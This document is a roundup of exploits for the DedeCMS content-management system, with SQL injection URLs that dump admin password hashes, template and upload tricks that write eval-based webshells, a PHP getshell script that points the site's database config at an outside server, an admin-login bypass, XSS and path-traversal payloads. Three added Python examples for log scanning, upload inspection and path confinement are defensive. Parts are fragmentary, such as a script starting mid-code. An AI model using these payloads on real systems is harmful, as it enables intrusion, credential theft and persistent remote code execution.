DedeCMS vulnerability roundup

Dedecms 5.6 rss.php injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability

Register as a member, upload a software item, and enter the following in the "local address" field:

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes it.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} 
This creates x.php with the password xiao, i.e. a one-line shell is generated directly.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; 
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/> 
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"><******%20src=http://www.test.com/ 

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20'%23@__admin' 

DEDECMS (all versions) gotopage variable XSS vulnerability

1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter must be disabled.

http://v57.demo.dedecms.com/dede/login.php?gotopage=">

2. Close the browser; afterwards, visiting either of the URLs below triggers our XSS no matter how they are reached.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell

#!usr/bin/php -w
12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";

}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*]  No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

织梦 (DedeCms) v5.6-5.7 unauthorised access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value to enter the site backend directly. This only works if the backend path is known.
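
Every entry so far travels in the request itself, so the cheapest defensive check is to look for these shapes in web-server access logs. The following is an added example, not code from this page or from the DedeCMS project: it URL-decodes the request line of constructed combined-format log lines (placeholder IPs, timestamps and hosts) and tags the variable-overwrite, SQL-injection, template-tag, traversal and reflected-XSS patterns that appear on this page. Only the query string reaches an access log; the `_COOKIE[GLOBALS]` variant sent in a POST body or cookie header needs WAF or application-level logging to be seen.

```python
"""Signature scan of web-server access logs for the DedeCMS request
patterns collected on this page (added example, not DedeCMS code).

SAMPLE_LOG is constructed for this example: IPs, timestamps and hosts
are placeholders, and the requests mirror the URLs shown on the page.
"""
import re
from urllib.parse import unquote_plus

# (label, regex) pairs applied to the URL-decoded, lower-cased request path.
RULES = [
    # _POST[GLOBALS][cfg_*] / _COOKIE[GLOBALS] configuration overwrite
    ("variable-overwrite",
     re.compile(r"(?:_cookie|_post|_get|_request)\[globals\]|globals\]\[cfg_")),
    # rss.php, advancedsearch.php, feedback_js.php style SQL injection
    ("sql-injection",
     re.compile(r"updatexml\s*\(|union\s+(?:all\s+)?select|from\s+['`]?#@__|dede_admin")),
    # {dede:...} template tags or runphp='yes' arriving in user input
    ("template-tag-injection",
     re.compile(r"\{/?dede:[a-z0-9_]+|runphp\s*=\s*['\"]?yes")),
    # edit_face.php oldface / carbuyaction.php code traversal
    ("path-traversal",
     re.compile(r"(?:\.\./|\.\.\\){2,}")),
    # gotopage / gourl / TotalResult reflected XSS
    ("xss-reflected",
     re.compile(r"(?:gotopage|gourl|totalresult)=[^&]*[<'\"]")),
]

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"'
)


def decode_request(path, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are
    matched in their final form, then lower-case for comparison."""
    current = path
    for _ in range(rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current.lower()


def classify(line):
    """Return {ip, path, hits} for a parseable line, else None.
    'hits' lists the rule labels that matched (empty for benign lines)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request = decode_request(m.group("path"))
    hits = [label for label, rx in RULES if rx.search(request)]
    return {"ip": m.group("ip"), "path": m.group("path"), "hits": hits}


def scan(lines):
    """Return only the entries that matched at least one rule, in order."""
    results = []
    for line in lines:
        entry = classify(line)
        if entry and entry["hits"]:
            results.append(entry)
    return results


SAMPLE_LOG = [  # constructed
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /dede/login.php?dopost=login'
    '&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.9 HTTP/1.1" 200 100',
    '203.0.113.8 - - [01/Jan/2024:10:00:02 +0000] "GET /plus/advancedsearch.php?mid=1'
    '&sql=SELECT%20*%20FROM%20%27%23@__admin%27 HTTP/1.1" 200 100',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /member/edit_face.php?dopost=delold'
    '&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 100',
    '203.0.113.10 - - [01/Jan/2024:10:00:04 +0000] "GET /plus/rss.php?tid=1&_Cs[][1]=1'
    '&_Cs[2))%20AND%20updatexml(1,1,1)%23][0]=1 HTTP/1.1" 500 100',
    '203.0.113.11 - - [01/Jan/2024:10:00:05 +0000] "GET /member/login.php'
    '?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]:<14} {",".join(hit["hits"]):<24} {hit["path"]}')
```

The rules are deliberately narrow (they key on identifiers such as `GLOBALS][cfg_` and `#@__` that no legitimate DedeCMS request carries), so they are suitable as a first triage pass over historical logs rather than as a blocking WAF rule set.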

dedecms 织梦 tag remote file write vulnerability

Precondition: you must have your own dede database prepared, then insert the following row:

insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell appears as 1.php in the same directory. Work out the principle yourself.

Dedecms <= V5.6 Final template execution vulnerability

1. Upload a template file:
Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example, the image name is:

uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and construct a form:

[Residue of the "Edit article" form: field labels "separate with commas", "coloured categories cannot be selected", "brief description of the content", "construct here", "detailed content", a hidden input (style="display:none") and the captcha prompt "Can't read? Click to refresh"; the form markup itself was not preserved.]

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is created in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)

Gif89a
{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save as 1.gif
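
Both the template-execution entry above and this gif89a variant rely on an upload filter that looks at the file name or the first few bytes and nothing else. The following is an added example, not code from this page or from DedeCMS: it checks that the magic bytes agree with the declared extension and then scans the whole body for the `{dede:...}`, `runphp` and PHP markers shown on this page. The sample blobs (a real 1x1 GIF, a GIF-headed polyglot and a bare template) are constructed for the example.

```python
"""Inspect an uploaded "image" for the template-tag and PHP payloads
described above (added example, not DedeCMS code).

A file that starts with a genuine GIF signature can still carry
{dede:...} tags or PHP after the header, so a magic-bytes check alone is
exactly the gap the gif89a trick walks through.  The SAMPLE_* blobs are
constructed for this example.
"""
import re

# Payload markers taken from the patterns on this page, matched
# case-insensitively over the raw bytes.
MARKERS = [
    ("dede-tag", re.compile(rb"\{/?dede:[a-z0-9_]+", re.I)),
    ("runphp",   re.compile(rb"runphp\s*=\s*['\"]?yes", re.I)),
    ("php-open", re.compile(rb"<\?(?:php|=)", re.I)),
    ("php-eval", re.compile(rb"\b(?:eval|assert|system|passthru)\s*\(", re.I)),
]

# Signatures are case-sensitive: "Gif89a" is not a valid GIF header.
IMAGE_MAGIC = [
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
]
EXT_KIND = {"gif": "gif", "jpg": "jpeg", "jpeg": "jpeg", "png": "png"}


def image_type(data):
    """Return the image kind implied by the leading bytes, or None."""
    for magic, kind in IMAGE_MAGIC:
        if data.startswith(magic):
            return kind
    return None


def inspect_upload(data, declared_ext):
    """Return (accepted, reasons).  The file is rejected when the
    signature is missing or disagrees with the declared extension, or
    when any payload marker appears anywhere in the body."""
    reasons = []
    kind = image_type(data)
    expected = EXT_KIND.get(declared_ext.lower().lstrip("."))
    if kind is None:
        reasons.append("no-image-signature")
    elif kind != expected:
        reasons.append(f"signature-{kind}-vs-ext-{declared_ext}")
    for label, rx in MARKERS:
        if rx.search(data):
            reasons.append(label)
    return (not reasons, reasons)


# A real 1x1 GIF89a and two polyglot/template payloads (all constructed).
SAMPLE_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
              b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
SAMPLE_POLYGLOT = (b"GIF89a\n{dede:field name='toby57' runphp='yes'}\n"
                   b"phpinfo();\n{/dede:field}\n")
SAMPLE_TEMPLATE = (b"{dede:name runphp='yes'}\n$fp = @fopen('1.php', 'a');\n"
                   b"@fwrite($fp, 'eval($_POST[cmd])');\n{/dede:name}\n")

if __name__ == "__main__":
    for name, blob in [("gif", SAMPLE_GIF), ("polyglot", SAMPLE_POLYGLOT),
                       ("template", SAMPLE_TEMPLATE)]:
        print(name, inspect_upload(blob, "gif"))
```

Marker scanning catches the payloads on this page but not every obfuscation, so the durable fix is the one these entries imply: never hand an uploaded file to the template engine, and re-encode accepted images through an image library so that anything after the pixel data is dropped.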

Construct a form as above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:


织梦 (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuyaction.php?dopost=return&code=../../
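
The edit_face.php deletion above and this carbuyaction.php inclusion are the same defect twice: a request value is joined into a filesystem path without being confined to the directory it is supposed to name. The following is an added example, not code from this page or from DedeCMS, showing the two checks a defender would apply: component-wise confinement to uploads/userup/<uid>/ for the face path (directory layout as shown on the page), and an allow-list lookup for the payment-module identifier. WEBROOT, the include/payment/ location and the KNOWN_MODULES set are assumptions for the demo.

```python
"""Confine user-supplied file references to one allowed directory
(added example, not DedeCMS code).

The function receives the value after URL decoding, which is what PHP's
$_GET hands to the application.  Pure posixpath string logic so it
behaves identically everywhere; for files that exist, also resolve
symlinks with os.path.realpath() after this check and before deleting or
including anything.  WEBROOT, the include/payment/ location and
KNOWN_MODULES are assumptions for this demo, not values from the page.
"""
import posixpath
import re

WEBROOT = "/var/www/html"   # assumed document root


def confine(webroot, allowed_subdir, user_path):
    """Return the normalised absolute path if user_path names a file
    strictly inside webroot/allowed_subdir, otherwise None."""
    # Null bytes and backslashes have no place in a web-relative path;
    # PHP on Windows would treat '\' as a separator that posixpath does not.
    if "\x00" in user_path or "\\" in user_path:
        return None
    allowed = posixpath.normpath(posixpath.join(webroot, allowed_subdir))
    # The value is interpreted relative to the web root even when it
    # starts with '/', which is how the uploads/userup/... paths on this
    # page are used.
    candidate = posixpath.normpath(posixpath.join(webroot, user_path.lstrip("/")))
    # commonpath compares whole components, so 'userup/89' cannot pass
    # as 'userup/8' the way a plain startswith() prefix check would allow.
    if posixpath.commonpath([allowed, candidate]) != allowed:
        return None
    if candidate == allowed:
        return None   # must name a file, not the directory itself
    return candidate


def old_face_path(uid, oldface):
    """edit_face.php-style rule: member uid may only reference files under
    uploads/userup/<uid>/ (directory layout as shown on this page)."""
    if not re.fullmatch(r"[0-9]+", str(uid)):
        return None
    return confine(WEBROOT, f"uploads/userup/{uid}", oldface)


# Constructed stand-in for the set of payment modules the application ships.
KNOWN_MODULES = {"module_a", "module_b"}


def payment_module_file(code):
    """carbuyaction.php-style include: 'code' is only ever an identifier,
    so look it up in an allow-list instead of joining it into a path."""
    if code in KNOWN_MODULES:
        return f"{WEBROOT}/include/payment/{code}.php"
    return None


if __name__ == "__main__":
    for p in ("/uploads/userup/8/face.jpg",
              "/uploads/userup/8/../../../member/templets/images/m_logo.gif"):
        print(p, "->", old_face_path(8, p))
    print("../../ ->", payment_module_file("../../"))
```

The uid is taken from the session, never from the request, so the confinement root cannot itself be steered by the caller; that is the check the oldface payload above depends on being absent.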

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT * FROM '#@__admin'

The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, giving a 20-character MD5 password; from that, remove 3 more from the front and 1 from the end to get the 16-character MD5.

dedecms 织梦 v5.6 two cross-site scripting vulnerabilities

/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.test.net%3E&PageNo=2

http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E

织梦 (Dedecms) select_soft_post.php uninitialised page variable vulnerability

Dedecms v55 RCE Exploit Codz By flyh4t

---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- 

Select U Shell

It's just a exp for the bug of Dedecms V55...
Need register_globals = on...
Fun the game,get a webshell at /data/cache/fly.php...

织梦 (DEDECMS) 5.1 plus/feedback_js.php injection vulnerability

To close the quotes I used union twice.

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS 5.1 SQL Injection 

######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discovered By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' "; 
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

织梦 (dedecms) V5.5 pagination function information disclosure vulnerability

http://www.dedecms.com/plus/list.php?tid=10&pageno=0
http://www.dedecms.com/plus/list.php?tid=10&pageno='
http://www.dedecms.com/plus/list.php?tid=10&pageno=-1

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability

This relies on a MySQL numeric overflow that raises an error, combined with DEDECMS recording database error messages into a PHP file whose header performs no validation.

1. Visit the URL:

http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is displayed.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the action address in the form is

After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

DEDECMS cross-site scripting and absolute path disclosure vulnerability

Submit:

http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn redirects to http://00day.cn

Beginners may think this is the whole of the XSS, but it is not; we can try to close the tag. PHP's gpc (magic_quotes_gpc) restriction gets in the way, though, so how do we bypass it?

Submit:

http://127.0.0.1/dc/include/jump.php?gurl=%23"/*

Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x 

# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]

Php Path Disclosure

[DedeCms WebSite]/include/dialog/

XSRF 

[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker writes an "end of textarea" tag that gives XSS alert :)

[XSS Code] :'">

织梦 (dedecms) 2007 group/search.php injection vulnerability

http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'

